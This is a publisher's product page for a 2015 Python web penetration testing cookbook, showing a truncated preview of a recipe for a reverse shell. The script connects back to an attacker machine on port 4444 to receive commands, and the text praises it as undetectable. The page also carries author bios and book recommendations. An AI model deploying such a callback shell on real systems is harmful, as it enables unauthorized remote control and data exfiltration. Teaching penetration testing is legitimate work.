Packt+ | Advance your knowledge in tech

0

All Products

Best Sellers

New Releases

Books

Videos

Audiobooks

Free Learning

Python Web Penetration Testing Cookbook

You're reading from Python Web Penetration Testing Cookbook Over 60 indispensable Python recipes to ensure you always have the right code on hand for web application testing

Product type Paperback

Published in Jun 2015

Publisher

ISBN-13 9781784392932

Length 224 pages

Edition 1st Edition

Languages

Python

Concepts

Web Penetration Testing

Authors (4):

Cameron Buchanan

Terry Ip

Andrew Mabbitt

Benjamin May

View More author details

Table of Contents (16) Chapters

Python Web Penetration Testing Cookbook

Credits

About the Authors

About the Reviewers

www.PacktPub.com

Preface

1. Gathering Open Source Intelligence FREE CHAPTER

2. Enumeration

3. Vulnerability Identification

4. SQL Injection

5. Web Header Manipulation

6. Image Analysis and Manipulation

7. Encryption and Encoding

8. Payloads and Shells

9. Reporting

Index

Creating a simple Netcat shell

The following script we're going to create leverages the use of raw sockets to exfiltrate data from a network. The general idea of this shell is to create a connection between the compromised machine and your own machine through a Netcat (or other program) session and send commands to the machine this way.

The beauty of this Python script is the undetectable nature of it, as it appears as a completely legitimate script.

How to do it…

This is the script that will establish a connection through Netcat and read the input:

import socket
import subprocess
import sys
import time

HOST = '172.16.0.2'    # Your attacking machine to connect back to
PORT = 4444           # The port your attacking machine is listening on

def connect((host, port)):
   go = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   go.connect((host, port))
   return go

def wait(go):
   data = go.recv(1024)
   if data == "exit\n":
      go.close()
      sys.exit(0)
   elif len(data)==0:
      return...

The rest of the chapter is locked

Register for a free Packt account to unlock a world of extra content!

A free Packt account unlocks extra newsletters, articles, discounted offers, and much more. Start advancing your knowledge today.

Unlock this book and the full library FREE for 7 days

Get unlimited access to 7000+ expert-authored eBooks and videos courses covering every tech area you can think of

Start free trial

Renews at $15.99/month. Cancel anytime

Authors (4)

Cameron Buchanan

Cameron Buchanan

Cameron Buchanan is a penetration tester by trade and a writer in his spare time. He has performed penetration tests around the world for a variety of clients across many industries. Previously, Cameron was a member of the RAF. In his spare time, he enjoys doing stupid things, such as trying to make things fly, getting electrocuted, and dunking himself in freezing cold water. He is married and lives in London.

See other products by Cameron Buchanan

Terry Ip

Terry Ip

Terry Ip is a security consultant. After nearly a decade of learning how to support IT infrastructure, he decided that it would be much more fun learning how to break it instead. He is married and lives in Buckinghamshire, where he tends to his chickens.

See other products by Terry Ip

Andrew Mabbitt

Andrew Mabbitt

Andrew Mabbitt is a penetration tester living in London, UK. He spends his time beating down networks, mentoring, and helping newbies break into the industry. In his free time, he loves to travel, break things, and master the art of sarcasm.

See other products by Andrew Mabbitt

Benjamin May

Benjamin May

Benjamin May is a security test engineer from Cambridge. He studied computing for business at Aston University. With a background in software testing, he recently combined this with his passion for security to create a new role in his current company. He has a broad interest in security across all aspects of the technology field, from reverse engineering embedded devices to hacking with Python and participating in CTFs. He is a husband and a father.

See other products by Benjamin May

Personalised recommendations for you

Based on your interests and search pattern

Cloud Security Handbook

Cloud Security Handbook

This book provides complete coverage of every cloud security aspect—from initial design to ongoing maintenance. Packed with best practices, it helps you smoothly transition to the public cloud, while keeping your environments secure and compliant.

Apr 2025 16h 4m

CompTIA CySA+ (CS0-003) Certification Guide

CompTIA CySA+ (CS0-003) Certification Guide

Prepare for CompTIA CySA+ (CS0-003) exam with this study guide—covering security ops, incident response, and vulnerability management in depth to level up your cybersecurity career. Includes exam-style questions, 2 practice tests, and flashcards.

Apr 2025 24h 44m

Cyber Security Kill Chain - Tactics and Strategies

Cyber Security Kill Chain - Tactics and Strategies

Learn how the cyber kill chain, a structured model that outlines the stages of a cyberattack, guides you through understanding threat actor behaviors and bolstering their ability to defend against evolving cyber threats.

May 2025 10h 16m